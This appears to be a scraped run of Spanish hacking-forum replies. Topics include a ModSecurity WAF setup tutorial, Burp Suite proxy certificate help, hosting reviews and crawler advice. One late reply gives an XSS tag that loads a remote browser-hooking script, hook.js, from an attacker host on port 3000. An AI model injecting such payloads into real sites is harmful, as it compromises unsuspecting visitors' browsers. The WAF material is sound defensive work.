You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Para empezar no tienes completo acceso al panel de control, registros DNS y demás, ya que ellos usan su propio sistema.
El webmail falla en muchas ocasiones y darte de baja es una autentica odisea y te bloquean el dominio una practica muy poco ética....
No es experiencia personal mio sino de varios ex-clientes míos, que pasaron a ser mas felices con otros hosting de mayor calidad.

Además, en mi experiencia la web alojada no iba muy fluida pese a ser simple HTML (no era mia)

Y para dos o tres cosas que tuvimos que contactar puesto a que vía ticket era imposible (pasaban de nosotros), tuvimos que hacerlo vía telefónica y después de pasar la "pelota" de un operador a otro poniendo largas y cambiando de departamento constantemente, dábamos con alguien que nos solucionaba la incidencia.

Un saludo.

Hola a todos! En esta entrada vamos a tratar de cero los WAF (Web Application Firewall). Por tanto, debemos empezar por el principio.

Como su propio nombre indica, es un firewall a nivel de aplicación web. Owasp lo define como:

Un waf es un firewall para aplicaciones HTTP. Aplica un conjunto de reglas que cubren ataques comunes como XSS, SQLi etc...

Tipos de WAF

Hay dos tipos de WAF, los que se residen en la red (es decir son un elemento más de la red) y los que se basan en el servidor de aplicaciones (residen en el servidor). Los WAF son elementos complementarios a las medidas de seguridad que soportan los Firewall clásicos.

Llegados a este punto, no nos debería resultar muy complejo entender el siguiente esquema:


Modelos de seguridad

Seguridad Positiva

Este tipo de modelo bloquea todas las peticiones. Sólo acepta las que son seguras, para distinguirlas tiene una serie de reglas.

A priori parece lo más idóneo ya que nos protegemos de nuevos ataques, pero resulta difícil de mantener si la página web tiene un desarrollo continuo pues nos veremos obligados a modificar las reglas constantemente.


Seguridad Negativa

Este modelo es todo lo contrario al anterior, ya que acepta todas las peticiones, bloqueando las que detecta como amenazas. Puesto a que depende de las reglas, suele ser menos fiable, pues el riesgo de bypass se incrementa.

¿Pero esto es seguro?

Hay que tener siempre claro que la seguridad al 100% no existe y esto es tan sólo, un nivel más de seguridad, que sin duda, es más que útil. Como se ha comentado anteriormente, un WAF funciona con reglas y por tanto, esas reglas pueden tener fallos y/o no contemplar nuevos ataques.

¿Cómo consigo un WAF?

En este punto debemos plantearnos si queremos un WAF comercial o uno OpenSource, obviamente las diferencias son notables. En este caso he escogido uno de los más populares, que es modsecurity (You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login


Es un módulo para servidores HTTP (Apache, NGINX y Microsoft IIS)  cuyo propósito es reforzar la seguridad de las aplicaciones Web. Modsecurity es OpenSource, además, provee un lenguaje de reglas y una API para implementar protecciones avanzadas, permitiendo bloquear gran cantidad de ataques webs, convirtiéndose en un efectivo sistema de prevención y detección de intrusos para servidores Web.

¡Desplegando ModSecurity!

Para obtener modsecurity deberemos instalar lo siguiente:

apt-get install libapache2-modsecurity

Una vez instalado, accedemos al directorio (en mi caso) de los mods disponibles en Apache, para ello visualizamos (o creamos si no existe) el fichero mod-security.conf.

<IfModule security2_module>
# Default Debian dir for modsecurity's persistent data
SecDataDir /var/cache/modsecurity

# Include all the *.conf files in /etc/modsecurity.
# Keeping your local configuration in that directory
# will allow for an easy upgrade of THIS file and
# make your life easier
Include "/etc/modsecurity/*.conf"
</IfModule>

Como se puede observar, simplemente incluye todos los ficheros con la extensión ".conf" alojados en /etc/modsecurity. En dicho directorio, tenemos un fichero de configuración recomendado, para activarlo, simplemente debemos renombrarlo y dejarlo con la extensión .conf.



Modsecurity incluye por defecto reglas, éstas están situadas en /usr/share/modsecurity-crs y hace falta activarlas para que empiecen a funcionar, para ello creamos un enlace simbólico de las base_rules a las activated_rules.

Quedando de la siguiente manera:


Tan sólo nos queda activar modsecurity en nuestro sitio, para ello nos dirigimos a /etc/apache2/sites-avalaible y añadimos la información del módulo (dichas líneas incluyen "activan"  las reglas y las configuraciones de modsecurity)

<IfModule security2_module>
SecRuleEngine DetectionOnly
Include "/usr/share/modsecurity-crs/*.conf"
Include "/usr/share/modsecurity-crs/activated_rules-testing/*.conf"
</IfModule>

NOTA: DetectionOnly indica que logeé, pero que no bloqueé, de querer bloquear, también se debería editar en la configuración situada en /etc/modsecurity (séptima línea).

Por último reinciamos apache y ya tenemos modsecurity funcionando!

¡Probando ModSecurity!

Para probarlo de forma sencilla, inyectaremos un XSS vía GET en la página, monitorizando los logs para comprobar si la regla lo detecta y lo logea.

Para ello, monitorizamos los logs e inyectamos el XSS.

tail -f /var/log/apache2/modsec_audit.log

Como se puede comprobar a continuación la inyección es detectada y registrada.

En la primera parte del log podremos ver los detalles de la conexión:

A continuación, podremos comprobar la respuesta por parte del servidor entregada al cliente y las firmas que han detectado el ataque.

Por último, visualizaremos el tipo de ataque y el modo de actuar del WAF.

Muchísimas gracias @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login & @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Un saludo.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Hola,

Proba pasando un crawler como el de acunetix. Este lista todos los directorios y archivos subidos y con eso puedes obtener no solo la ruta, sino también el nombre que le ha puesto el sitio.

Saludos,
ANTRAX

Ya intente pero la site es HTPPS, subdomain.

No tiene nada que ver que la web tenga SSL, puedes pasarle un crawler igual...

La imagen se refleja en algún sitio? Si es así puedes recuperar el link

Un saludo.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
En cuanto a hosting te puedo recomendar no usar nunca 1&1, por experiencia personal es horrible.

Que fue tan malo?. yo lo use y apenas lo iba a recomendar 

Para mi horrible también, sobre todo su soporte.

Saludos.

Yo te recomiendo ultrasurf, cuando yo estudiaba TOR estaba bloqueado, pero éste no.

Un saludo.

Hola!

Podrías utilizar el buscador, esta pregunta ha sido respondido muchas veces...

Te dejo unos links de utilidad:

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Un saludo

Sin duda, si quieres un blog te recomiendo WordPress, otra alternativa sería usar blogger, aunque pierde la gracia si quieres editarlo a gran escala.

Respecto a hostings... a mi me gusta OVH, pero es más a gustos, simplemente porque es barato y nunca me ha dado problemas, pues uso VPS y lo administro yo.

Un saludo.

Muchísimas gracias @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login y gracias también a todos los que me habéis felicitado por privado.

Ya sabéis que es todo un placer dedicarle mi tiempo a esta gran comunidad

Un saludo,

Blackdrake

Llego algo tarde pero hecho!


5918fcf8734a901599b0ff7346f55c19eb59ef05

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Hola @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login no entiendo mucho tu pregunta, pero leí por ahí que quieres implementar https, te recomiendo uno gratuito por 3 meses, con un cron puedes hacerlo renovable en automatico:

https://letsencrypt.org/

Gracias por leer!
DUDA

Hola @DUDA, no tiene nada que ver, él tiene problemas con el certificado SSL de burpsuite, letsencrypt es muy bueno, pero sirve para tener SSL en tu servidor web.

Un saludo.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Hola chicos, tengo una duda, es posible saber los endpoints dentro de una pagina web? Si es posible, como lo puedo hacer? Gracias de antemano 

No sé exactamente a que te refieres, ¿podrías dar más información?

Si quieres ver algo de código, a no ser que tengas acceso a él, será imposible.

Un saludo.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Amigo puedes ser un poco mas tecnico al respecto para poder entender bien

CitarSi no funciona con la dirección "burp", prueba directamente con la dirección de tu proxy, por ejemplo, 127.0.0.1:8080 o la que tengas configurada, debería de cargar correctamente.

Te refires exactamente aque? la configuracion por defecto trabajando con zaproxy y burp es 127.0.0.1;8080 como dices pero de hay necesito el certificado, ya que la intercepcion me arroja error, o esque entiendo mal!! lo que me quieres decir... necesito burp para una prueba muy importante AYUDAAA!!!

Creo que ni conoces como funciona un proxy, así es imposible que lo configures correctamente.

Es tan simple como esto, abres burpsuite, configuras el proxy (IPy puerto), acto seguido vas a tu navegador y configuras el proxy del burp para que todas las peticiones pasen por éste. En ese paso todas las peticiones HTTP las podrás interceptar sin ningún problema.

Si quieres el certificado SSL (para HTTPs), es tan simple como acceder a http://IP:PUERTO (del proxy en burp) para poder descargarlo, luego lo instalas y listo.

Un saludo.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Usa un antivirus comun, detectan keyloggers

Exacto, además también puedes usar algún antimalware como malwarebytes

Un saludo.

Muy muy buen post @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, muy bien explicado y elaborado.

Espero seguir viéndote por aquí con grandes aportes como éste, estoy seguro que a los más nuevos les ayudará muchísimo.

Un saludo.

Estoy casi seguro de que es tema de permisos.

Comprueba que tenga permisos el PHP, la carpeta donde esté ese PHP y el txt (resource.txt)

Con eso debería de funcionar.

Un saludo.

Bueno, bonito y barato

Muchas gracias @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, con tu permiso lo pasaré a C# y si queda bien lo subo

Un saludo y gracias

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
joder, sonrojandome en 3,2,1.... ni si quiera sabia que hacíais estas cosas. Es un tremendo honor estar entre los 5 finalistas. ¿Hacéis esto todos los meses?

Así es, o al menos, lo intentamos

PD: Yo ya dejé mi voto

Un saludo.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
sip efectivamente el de terminacion .js 

Como estás haciendo el tag? Recuerda que debes inyectarlo de la manera que quieras, pero que se ejecute javascript, por ejemplo:

<script src="http://x.x.x.x:3000/hook.js"></script>

Cada certificado es diferente, por tanto, aunque te pase el mio no te servirá.

Recuerda colocar correctamente el proxy en tu navegador, de lo contrario nunca encontrará la dirección.

Si no funciona con la dirección "burp", prueba directamente con la dirección de tu proxy, por ejemplo, 127.0.0.1:8080 o la que tengas configurada, debería de cargar correctamente.

Un saludo.